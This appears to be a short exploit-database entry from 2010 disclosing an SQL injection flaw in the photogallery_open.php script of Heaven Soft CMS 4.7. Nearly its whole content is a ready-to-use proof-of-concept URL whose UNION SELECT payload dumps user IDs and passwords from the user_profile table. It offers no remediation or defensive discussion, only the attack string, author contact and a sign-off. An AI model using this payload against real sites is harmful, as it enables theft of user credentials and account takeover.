Heaven Soft CMS 4.7 - 'photogallery_open.php' SQL Injection

EKU-ID: 19774	CVE:	OSVDB-ID:
Author: CoBRa_21	Published: 2010-05-14	Verified:
Download:

Rating

☆☆☆☆☆

-------------------------------------------------------------------------------------------

Heaven Soft CMS v 4.7 (photogallery_open.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://www.heavensoft.com.pk/

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/photogallery_open.php?cid=-10%20union%20select%20group_concat%28user_id,0x3a,password%29+from+user_profile--

-------------------------------------------------------------------------------------------

Melekler Bize Aglar , Biz Halimize Guleriz......